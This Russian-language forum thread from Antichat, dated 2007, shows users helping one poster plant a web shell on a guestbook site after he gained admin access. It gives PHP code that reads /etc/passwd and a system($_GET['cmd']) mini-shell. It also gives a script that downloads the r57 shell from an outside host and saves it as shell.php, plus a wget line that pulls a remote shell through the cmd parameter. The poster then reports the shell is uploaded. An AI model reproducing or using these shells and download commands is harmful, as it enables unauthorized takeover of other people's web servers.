Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |

01.08.2007, 16:30
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме: 3895065
Репутация:
1112
|
|
Поправьте
Зашел в админку гостевухи
написал
PHP код:
<? if (isset($_GET['do'])) {
readfile("/etc/passwd");
die();
}
?>
в броузере пишу /guest.php?do
ничё не вылазает...
и ещё вопрос, как залить шелл?Вот так чтоль?-
PHP код:
<? system($_POST["cmd"]))
?>
и потом в броузере /guest.php? POST: cmd=[command]
?
иль просто помогите r57 залить. спасиб
|
|
|

01.08.2007, 16:39
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме: 7084941
Репутация:
2277
|
|
1. да он читает файл..
2. мини-шелл))
PHP код:
<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>
или $_POST['cmd'] смотря как передаешь..
З.Ы.
у тя лишняя скобка и нет ;
system($_POST["cmd"] )) ;
ну и добавь для нормального отображения
|
|
|

01.08.2007, 16:44
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме: 3895065
Репутация:
1112
|
|
а если вот так:
[PHP]
<?php
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>
[PHP]
и потом guest/shell.php
|
|
|

01.08.2007, 16:44
|
|
Познающий
Регистрация: 02.07.2007
Сообщений: 39
Провел на форуме: 488774
Репутация:
30
|
|
/guest.php? POST: cmd=[command]
в таком виде и передавал?
|
|
|

01.08.2007, 16:47
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме: 3895065
Репутация:
1112
|
|
Всё спасиб, я сам разобрался =)
PHP код:
<?
$filen="httpL//www.xxx.ru/r57.php";
$file_new="shell.php";
$data = implode("", file($filen));
$fp = fopen($file_new, "w");
fputs($fp, $data);
fclose($fp);
?>
вот это помогло =)
//хех... ведь могу думать,когда захочу )
|
|
|

01.08.2007, 16:48
|
|
Познающий
Регистрация: 02.07.2007
Сообщений: 39
Провел на форуме: 488774
Репутация:
30
|
|
Можно проще
<PRE>
<?
system($_GET["cmd"]);
?>
</PRE>
потом http://site.ru/guest.php?cmd=wget http://[адресс шела]
будет загружен в текущую директорию, если права позволяют
|
|
|

01.08.2007, 16:49
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме: 5128756
Репутация:
2032
|
|
/guest.php?cmd=wget www.yoursite.ru/r57shell.php www.hackedsite.ru/shell.php
|
|
|

01.08.2007, 16:56
|
|
Banned
Регистрация: 24.08.2006
Сообщений: 483
Провел на форуме: 3895065
Репутация:
1112
|
|
угу,всё норм, уже всё залил, снач шелл, щас ремвьюв....всё,
топикклоус
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|